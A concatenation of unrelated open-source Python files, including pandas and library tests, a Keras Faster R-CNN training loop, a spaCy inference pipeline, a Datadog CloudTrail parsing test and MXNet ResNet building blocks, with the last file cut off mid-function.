.venv/lib/python3.8/site-packages/pandas/tests/indexes/timedeltas/test_shift.py | acrucetta/Chicago_COVI_WebApp | 115 | 16627 | import pytest
from pandas.errors import NullFrequencyError
import pandas as pd
from pandas import TimedeltaIndex
import pandas._testing as tm
class TestTimedeltaIndexShift:
# -------------------------------------------------------------
# TimedeltaIndex.shift is used by __add__/__sub__
def test_tdi_shift_empty(self):
# GH#9903
idx = pd.TimedeltaIndex([], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="H"), idx)
tm.assert_index_equal(idx.shift(3, freq="H"), idx)
def test_tdi_shift_hours(self):
# GH#9903
idx = pd.TimedeltaIndex(["5 hours", "6 hours", "9 hours"], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="H"), idx)
exp = pd.TimedeltaIndex(["8 hours", "9 hours", "12 hours"], name="xxx")
tm.assert_index_equal(idx.shift(3, freq="H"), exp)
exp = pd.TimedeltaIndex(["2 hours", "3 hours", "6 hours"], name="xxx")
tm.assert_index_equal(idx.shift(-3, freq="H"), exp)
def test_tdi_shift_minutes(self):
# GH#9903
idx = pd.TimedeltaIndex(["5 hours", "6 hours", "9 hours"], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="T"), idx)
exp = pd.TimedeltaIndex(["05:03:00", "06:03:00", "9:03:00"], name="xxx")
tm.assert_index_equal(idx.shift(3, freq="T"), exp)
exp = pd.TimedeltaIndex(["04:57:00", "05:57:00", "8:57:00"], name="xxx")
tm.assert_index_equal(idx.shift(-3, freq="T"), exp)
def test_tdi_shift_int(self):
# GH#8083
tdi = pd.to_timedelta(range(5), unit="d")
trange = tdi._with_freq("infer") + pd.offsets.Hour(1)
result = trange.shift(1)
expected = TimedeltaIndex(
[
"1 days 01:00:00",
"2 days 01:00:00",
"3 days 01:00:00",
"4 days 01:00:00",
"5 days 01:00:00",
],
freq="D",
)
tm.assert_index_equal(result, expected)
def test_tdi_shift_nonstandard_freq(self):
# GH#8083
tdi = pd.to_timedelta(range(5), unit="d")
trange = tdi._with_freq("infer") + pd.offsets.Hour(1)
result = trange.shift(3, freq="2D 1s")
expected = TimedeltaIndex(
[
"6 days 01:00:03",
"7 days 01:00:03",
"8 days 01:00:03",
"9 days 01:00:03",
"10 days 01:00:03",
],
freq="D",
)
tm.assert_index_equal(result, expected)
def test_shift_no_freq(self):
# GH#19147
tdi = TimedeltaIndex(["1 days 01:00:00", "2 days 01:00:00"], freq=None)
with pytest.raises(NullFrequencyError, match="Cannot shift with no freq"):
tdi.shift(2)
|
stolos/tests/test_bin.py | sailthru/stolos | 121 | 16629 | import os
from subprocess import check_output, CalledProcessError
from nose import tools as nt
from stolos import queue_backend as qb
from stolos.testing_tools import (
with_setup, validate_zero_queued_task, validate_one_queued_task,
validate_n_queued_task
)
def run(cmd, tasks_json_tmpfile, **kwargs):
cmd = (
"set -o pipefail ; STOLOS_TASKS_JSON={tasks_json} {cmd}").format(
cmd=cmd, tasks_json=tasks_json_tmpfile, **kwargs)
rv = check_output(cmd, shell=True, executable="bash", env=os.environ)
return rv
@with_setup
def test_stolos_submit(app1, job_id1, tasks_json_tmpfile):
with nt.assert_raises(CalledProcessError):
run("stolos-submit -h", tasks_json_tmpfile)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s" % (app1, job_id1), tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
run("stolos-submit -a %s -j %s" % (app1, job_id1), tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
@with_setup
def test_stolos_submit_readd(app1, job_id1, tasks_json_tmpfile):
qb.set_state(app1, job_id1, failed=True)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s" % (app1, job_id1),
tasks_json_tmpfile)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s --readd" % (app1, job_id1),
tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
@with_setup
def test_stolos_submit_multiple_jobs(app1, app2, job_id1, job_id2,
tasks_json_tmpfile):
validate_zero_queued_task(app1)
validate_zero_queued_task(app2)
run("stolos-submit -a %s %s -j %s %s" % (app1, app2, job_id1, job_id2),
tasks_json_tmpfile)
validate_n_queued_task(app1, job_id1, job_id2)
validate_n_queued_task(app2, job_id1, job_id2)
run("stolos-submit -a %s %s -j %s %s" % (app1, app2, job_id1, job_id2),
tasks_json_tmpfile)
validate_n_queued_task(app1, job_id1, job_id2)
validate_n_queued_task(app2, job_id1, job_id2)
|
tests/test_api.py | bh-chaker/wetterdienst | 155 | 16631 | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, earthobservations developers.
# Distributed under the MIT License. See LICENSE for more info.
import pytest
from wetterdienst import Wetterdienst
@pytest.mark.remote
@pytest.mark.parametrize(
"provider,kind,kwargs",
[
# German Weather Service (DWD)
(
"dwd",
"observation",
{"parameter": "kl", "resolution": "daily", "period": "recent"},
),
("dwd", "forecast", {"parameter": "large", "mosmix_type": "large"}),
# Environment and Climate Change Canada
("eccc", "observation", {"parameter": "daily", "resolution": "daily"}),
],
)
@pytest.mark.parametrize("si_units", (False, True))
def test_api(provider, kind, kwargs, si_units):
""" Test main wetterdienst API """
# Build API
api = Wetterdienst(provider, kind)
# Discover parameters
assert api.discover()
# All stations
request = api(**kwargs, si_units=si_units).all()
stations = request.df
# Check stations DataFrame columns
assert set(stations.columns).issuperset(
{
"station_id",
"from_date",
"to_date",
"height",
"latitude",
"longitude",
"name",
"state",
}
)
# Check that there are actually stations
assert not stations.empty
# Query first DataFrame from values
values = next(request.values.query()).df
# TODO: DWD Forecast has no quality
assert set(values.columns).issuperset(
{"station_id", "parameter", "date", "value", "quality"}
)
assert not values.empty
|
crowd_anki/export/anki_exporter_wrapper.py | katrinleinweber/CrowdAnki | 391 | 16633 | from pathlib import Path
from .anki_exporter import AnkiJsonExporter
from ..anki.adapters.anki_deck import AnkiDeck
from ..config.config_settings import ConfigSettings
from ..utils import constants
from ..utils.notifier import AnkiModalNotifier, Notifier
from ..utils.disambiguate_uuids import disambiguate_note_model_uuids
EXPORT_FAILED_TITLE = "Export failed"
class AnkiJsonExporterWrapper:
"""
Wrapper designed to work with standard export dialog in anki.
"""
key = "CrowdAnki JSON representation"
ext = constants.ANKI_EXPORT_EXTENSION
hideTags = True
includeTags = True
directory_export = True
def __init__(self, collection,
deck_id: int = None,
json_exporter: AnkiJsonExporter = None,
notifier: Notifier = None):
self.includeMedia = True
self.did = deck_id
self.count = 0 # Todo?
self.collection = collection
self.anki_json_exporter = json_exporter or AnkiJsonExporter(collection, ConfigSettings.get_instance())
self.notifier = notifier or AnkiModalNotifier()
# required by anki exporting interface with its non-PEP-8 names
# noinspection PyPep8Naming
def exportInto(self, directory_path):
if self.did is None:
self.notifier.warning(EXPORT_FAILED_TITLE, "CrowdAnki export works only for specific decks. "
"Please use CrowdAnki snapshot if you want to export "
"the whole collection.")
return
deck = AnkiDeck(self.collection.decks.get(self.did, default=False))
if deck.is_dynamic:
self.notifier.warning(EXPORT_FAILED_TITLE, "CrowdAnki does not support export for dynamic decks.")
return
# Clean up duplicate note models. See
# https://github.com/Stvad/CrowdAnki/wiki/Workarounds-%E2%80%94-Duplicate-note-model-uuids.
disambiguate_note_model_uuids(self.collection)
# .parent because we receive name with random numbers at the end (hacking around internals of Anki) :(
export_path = Path(directory_path).parent
self.anki_json_exporter.export_to_directory(deck, export_path, self.includeMedia,
create_deck_subdirectory=ConfigSettings.get_instance().export_create_deck_subdirectory)
self.count = self.anki_json_exporter.last_exported_count
def get_exporter_id(exporter):
return f"{exporter.key} (*{exporter.ext})", exporter
def exporters_hook(exporters_list):
exporter_id = get_exporter_id(AnkiJsonExporterWrapper)
if exporter_id not in exporters_list:
exporters_list.append(exporter_id)
|
tests/bugs/test-200908181430.py | eLBati/pyxb | 123 | 16684 | # -*- coding: utf-8 -*-
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import pyxb.binding.generate
import pyxb.binding.datatypes as xs
import pyxb.binding.basis
import pyxb.utils.domutils
import os.path
xsd='''<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:simpleType name="foo"/>
</xs:schema>'''
from pyxb.exceptions_ import *
import unittest
class TestTrac_200908181430 (unittest.TestCase):
def testParsing (self):
self.assertRaises(pyxb.SchemaValidationError, pyxb.binding.generate.GeneratePython, schema_text=xsd)
if __name__ == '__main__':
unittest.main()
|
utils/utils_fit.py | bubbliiiing/faster-rcnn-keras | 282 | 16719 | import numpy as np
import tensorflow as tf
from keras import backend as K
from tqdm import tqdm
def write_log(callback, names, logs, batch_no):
for name, value in zip(names, logs):
summary = tf.Summary()
summary_value = summary.value.add()
summary_value.simple_value = value
summary_value.tag = name
callback.writer.add_summary(summary, batch_no)
callback.writer.flush()
def fit_one_epoch(model_rpn, model_all, loss_history, callback, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, anchors, bbox_util, roi_helper):
total_loss = 0
rpn_loc_loss = 0
rpn_cls_loss = 0
roi_loc_loss = 0
roi_cls_loss = 0
val_loss = 0
with tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen):
if iteration >= epoch_step:
break
X, Y, boxes = batch[0], batch[1], batch[2]
P_rpn = model_rpn.predict_on_batch(X)
results = bbox_util.detection_out_rpn(P_rpn, anchors)
roi_inputs = []
out_classes = []
out_regrs = []
for i in range(len(X)):
R = results[i]
X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i])
roi_inputs.append(X2)
out_classes.append(Y1)
out_regrs.append(Y2)
loss_class = model_all.train_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)])
write_log(callback, ['total_loss','rpn_cls_loss', 'rpn_reg_loss', 'detection_cls_loss', 'detection_reg_loss'], loss_class, iteration)
rpn_cls_loss += loss_class[1]
rpn_loc_loss += loss_class[2]
roi_cls_loss += loss_class[3]
roi_loc_loss += loss_class[4]
total_loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss
pbar.set_postfix(**{'total' : total_loss / (iteration + 1),
'rpn_cls' : rpn_cls_loss / (iteration + 1),
'rpn_loc' : rpn_loc_loss / (iteration + 1),
'roi_cls' : roi_cls_loss / (iteration + 1),
'roi_loc' : roi_loc_loss / (iteration + 1),
'lr' : K.get_value(model_rpn.optimizer.lr)})
pbar.update(1)
print('Start Validation')
with tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen_val):
if iteration >= epoch_step_val:
break
X, Y, boxes = batch[0], batch[1], batch[2]
P_rpn = model_rpn.predict_on_batch(X)
results = bbox_util.detection_out_rpn(P_rpn, anchors)
roi_inputs = []
out_classes = []
out_regrs = []
for i in range(len(X)):
R = results[i]
X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i])
roi_inputs.append(X2)
out_classes.append(Y1)
out_regrs.append(Y2)
loss_class = model_all.test_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)])
val_loss += loss_class[0]
pbar.set_postfix(**{'total' : val_loss / (iteration + 1)})
pbar.update(1)
logs = {'loss': total_loss / epoch_step, 'val_loss': val_loss / epoch_step_val}
loss_history.on_epoch_end([], logs)
print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))
print('Total Loss: %.3f || Val Loss: %.3f ' % (total_loss / epoch_step, val_loss / epoch_step_val))
model_all.save_weights('logs/ep%03d-loss%.3f-val_loss%.3f.h5' % (epoch + 1, total_loss / epoch_step, val_loss / epoch_step_val))
|
tools/pot/openvino/tools/pot/graph/gpu_patterns.py | ryanloney/openvino-1 | 1,127 | 16735 | # Copyright (C) 2020-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from .pattern_utils import check_fused_scale_shift_patterns, get_fused_scale_shift_patterns, \
check_fused_op_const_patterns, get_fused_op_const_pattern, get_clamp_mult_const_pattern
def get_gpu_ignored_patterns():
return {
'blocks': [(pattern, check_fused_scale_shift_patterns) for pattern in get_fused_scale_shift_patterns()] +
[(pattern, check_fused_op_const_patterns) for pattern in get_fused_op_const_pattern()],
'activations': [get_clamp_mult_const_pattern()],
'inputs': []
}
|
genrl/environments/vec_env/utils.py | matrig/genrl | 390 | 16756 | from typing import Tuple
import torch
class RunningMeanStd:
"""
Utility Function to compute a running mean and variance calculator
:param epsilon: Small number to prevent division by zero for calculations
:param shape: Shape of the RMS object
:type epsilon: float
:type shape: Tuple
"""
def __init__(self, epsilon: float = 1e-4, shape: Tuple = ()):
self.mean = torch.zeros(shape).double()
self.var = torch.ones(shape).double()
self.count = epsilon
def update(self, batch: torch.Tensor):
batch_mean = torch.mean(batch, axis=0)
batch_var = torch.var(batch, axis=0)
batch_count = batch.shape[0]
total_count = self.count + batch_count
delta = batch_mean - self.mean
new_mean = self.mean + delta * batch_count / total_count
M2 = (
self.var * self.count
+ batch_var * batch_count
+ (delta ** 2) * self.count * batch_count / total_count
)
self.mean = new_mean
self.var = M2 / (total_count - 1)
self.count = total_count
|
cointrader/config.py | 3con/cointrader | 103 | 16786 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import logging
import logging.config
if (sys.version_info > (3, 0)):
# Python 3 code in this block
import configparser
else:
# Python 2 code in this block
import ConfigParser as configparser
DEFAULT_CONFIG = ".cointrader.ini"
def get_path_to_config():
env = os.getenv("HOME")
return os.path.join(env, DEFAULT_CONFIG)
class Config(object):
def __init__(self, configfile=None):
self.verbose = False
self.market = "poloniex"
self.api_key = None
self.api_secret = None
if configfile:
logging.config.fileConfig(configfile.name)
config = configparser.ConfigParser()
config.readfp(configfile)
exchange = config.get("DEFAULT", "exchange")
self.api_key = config.get(exchange, "api_key")
self.api_secret = config.get(exchange, "api_secret")
@property
def api(self):
if not self.api_key or not self.api_secret:
raise RuntimeError("API not configured")
return self.api_key, self.api_secret
|
api-inference-community/docker_images/spacy/app/pipelines/text_classification.py | mlonaws/huggingface_hub | 362 | 16792 | <filename>api-inference-community/docker_images/spacy/app/pipelines/text_classification.py<gh_stars>100-1000
import os
import subprocess
import sys
from typing import Dict, List
from app.pipelines import Pipeline
class TextClassificationPipeline(Pipeline):
def __init__(
self,
model_id: str,
):
# At the time, only public models from spaCy are allowed in the inference API.
full_model_path = model_id.split("/")
if len(full_model_path) != 2:
raise ValueError(
f"Invalid model_id: {model_id}. It should have a namespace (:namespace:/:model_name:)"
)
namespace, model_name = full_model_path
package = f"https://huggingface.co/{namespace}/{model_name}/resolve/main/{model_name}-any-py3-none-any.whl"
cache_dir = os.environ["PIP_CACHE"]
subprocess.check_call(
[sys.executable, "-m", "pip", "install", "--cache-dir", cache_dir, package]
)
import spacy
self.model = spacy.load(model_name)
def __call__(self, inputs: str) -> List[List[Dict[str, float]]]:
"""
Args:
inputs (:obj:`str`):
a string containing some text
Return:
A :obj:`list`:. The object returned should be a list of one list like [[{"label": 0.9939950108528137}]] containing :
- "label": A string representing what the label/class is. There can be multiple labels.
- "score": A score between 0 and 1 describing how confident the model is for this label/class.
"""
doc = self.model(inputs)
categories = []
for cat, score in doc.cats.items():
categories.append({"label": cat, "score": score})
return [categories]
|
aws/logs_monitoring/tests/test_cloudtrail_s3.py | rkitron/datadog-serverless-functions | 232 | 16793 | <filename>aws/logs_monitoring/tests/test_cloudtrail_s3.py
from unittest.mock import MagicMock, patch
import os
import sys
import unittest
import json
import copy
import io
import gzip
sys.modules["trace_forwarder.connection"] = MagicMock()
sys.modules["datadog_lambda.wrapper"] = MagicMock()
sys.modules["datadog_lambda.metric"] = MagicMock()
sys.modules["datadog"] = MagicMock()
sys.modules["requests"] = MagicMock()
sys.modules["requests_futures.sessions"] = MagicMock()
env_patch = patch.dict(
os.environ,
{
"DD_API_KEY": "11111111111111111111111111111111",
"DD_ADDITIONAL_TARGET_LAMBDAS": "ironmaiden,megadeth",
},
)
env_patch.start()
import lambda_function
import parsing
env_patch.stop()
class Context:
function_version = 0
invoked_function_arn = "invoked_function_arn"
function_name = "function_name"
memory_limit_in_mb = "10"
test_data = {
"Records": [
{
"eventVersion": "1.08",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAYYB64AB3HGPQO2EPR:DatadogAWSIntegration",
"arn": "arn:aws:sts::601427279990:assumed-role/Siti_DatadogAWSIntegrationRole/i-08014e4f62ccf762d",
"accountId": "601427279990",
"accessKeyId": "ASIAYYB64AB3DWOY7JNT",
"sessionContext": {
"sessionIssuer": {
"type": "Role",
"principalId": "AROAYYB64AB3HGPQO2EPR",
"arn": "arn:aws:iam::601427279990:role/Siti_DatadogAWSIntegrationRole",
"accountId": "601427279990",
"userName": "Siti_DatadogAWSIntegrationRole",
},
"attributes": {
"creationDate": "2021-05-02T23:49:01Z",
"mfaAuthenticated": "false",
},
},
},
"eventTime": "2021-05-02T23:53:28Z",
"eventSource": "dynamodb.amazonaws.com",
"eventName": "DescribeTable",
"awsRegion": "us-east-1",
"sourceIPAddress": "172.16.31.10",
"userAgent": "Datadog",
"requestParameters": {"tableName": "KinesisClientLibraryLocal"},
"responseElements": None,
"requestID": "A9K7562IBO4MPDQE4O5G9QETRFVV4KQNSO5AEMVJF66Q9ASUAAJG",
"eventID": "a5dd11f9-f616-4ea8-8030-0b3eef554352",
"readOnly": True,
"resources": [
{
"accountId": "601427279990",
"type": "AWS::DynamoDB::Table",
"ARN": "arn:aws:dynamodb:us-east-1:601427279990:table/KinesisClientLibraryLocal",
}
],
"eventType": "AwsApiCall",
"apiVersion": "2012-08-10",
"managementEvent": True,
"recipientAccountId": "601427279990",
"eventCategory": "Management",
}
]
}
def test_data_gzipped() -> io.BytesIO:
return io.BytesIO(
gzip.compress(json.dumps(copy.deepcopy(test_data)).encode("utf-8"))
)
class TestS3CloudwatchParsing(unittest.TestCase):
def setUp(self):
self.maxDiff = 9000
@patch("parsing.boto3")
@patch("lambda_function.boto3")
def test_s3_cloudtrail_pasing_and_enrichment(self, lambda_boto3, parsing_boto3):
context = Context()
boto3 = parsing_boto3.client()
boto3.get_object.return_value = {"Body": test_data_gzipped()}
payload = {
"s3": {
"bucket": {
"name": "test-bucket",
},
"object": {
"key": "<KEY>"
},
}
}
result = parsing.parse({"Records": [payload]}, context)
expected = copy.deepcopy([test_data["Records"][0]])
expected[0].update(
{
"ddsource": "cloudtrail",
"ddsourcecategory": "aws",
"service": "cloudtrail",
"aws": {
"s3": {
"bucket": payload["s3"]["bucket"]["name"],
"key": payload["s3"]["object"]["key"],
},
"function_version": context.function_version,
"invoked_function_arn": context.invoked_function_arn,
},
}
)
# yeah, there are tags, but we don't care to compare them
result[0].pop("ddtags")
# expected parsed result, now testing enrichment
self.assertEqual(expected[0], result[0])
expected[0]["host"] = "i-08014e4f62ccf762d"
self.assertEqual(expected[0], lambda_function.enrich(result)[0])
if __name__ == "__main__":
unittest.main()
|
symbols/block.py | zerofo/sdu-face-alignment | 192 | 16796 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import mxnet as mx
import numpy as np
from config import config
def Conv(**kwargs):
body = mx.sym.Convolution(**kwargs)
return body
def Act(data, act_type, name):
if act_type=='prelu':
body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)
else:
body = mx.symbol.Activation(data=data, act_type=act_type, name=name)
return body
def ConvFactory(data, num_filter, kernel, stride=(1, 1), pad=(0, 0), act_type="relu", mirror_attr={}, with_act=True, dcn=False, name=''):
bn_mom = config.bn_mom
workspace = config.workspace
if not dcn:
conv = mx.symbol.Convolution(
data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad, no_bias=True, workspace=workspace, name=name+'_conv')
else:
conv_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = data,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=data, offset=conv_offset,
num_filter=num_filter, pad=(1,1), kernel=(3,3), num_deformable_group=1, stride=stride, dilate=(1, 1), no_bias=False)
bn = mx.symbol.BatchNorm(data=conv, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name+'_bn')
if with_act:
act = Act(bn, act_type, name=name+'_relu')
#act = mx.symbol.Activation(
# data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu')
return act
else:
return bn
def conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
#if binarize:
# conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
shortcut = mx.sym.QConvolution(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv3 + shortcut
def conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilation, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
if not dcn:
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
conv1_offset = mx.symbol.Convolution(name=name+'_conv1_offset', data = act1,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv1 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv1', data=act1, offset=conv1_offset,
num_filter=int(num_filter*0.5), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
if not dcn:
conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
conv2_offset = mx.symbol.Convolution(name=name+'_conv2_offset', data = act2,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv2 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv2', data=act2, offset=conv2_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution_v1(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
if not dcn:
conv3 = Conv(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv3')
else:
conv3_offset = mx.symbol.Convolution(name=name+'_conv3_offset', data = act3,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv3 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv3', data=act3, offset=conv3_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution_v1(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
conv4 = mx.symbol.Concat(*[conv1, conv2, conv3])
if binarize:
conv4 = mx.sym.BatchNorm(data=conv4, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
#assert(False)
shortcut = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
shortcut = mx.sym.BatchNorm(data=shortcut, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc_bn')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv4 + shortcut
#return bn4 + shortcut
#return act4 + shortcut
def block17(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
tower_conv = ConvFactory(net, 192, (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, 129, (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, 160, (1, 7), pad=(1, 2), name=name+'_conv1_1')
tower_conv1_2 = ConvFactory(tower_conv1_1, 192, (7, 1), pad=(2, 1), name=name+'_conv1_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def block35(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
M = 1.0
tower_conv = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, int(input_num_channels*0.25*M), (3, 3), pad=(1, 1), name=name+'_conv1_1')
tower_conv2_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv2_0')
tower_conv2_1 = ConvFactory(tower_conv2_0, int(input_num_channels*0.375*M), (3, 3), pad=(1, 1), name=name+'_conv2_1')
tower_conv2_2 = ConvFactory(tower_conv2_1, int(input_num_channels*0.5*M), (3, 3), pad=(1, 1), name=name+'_conv2_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_1, tower_conv2_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
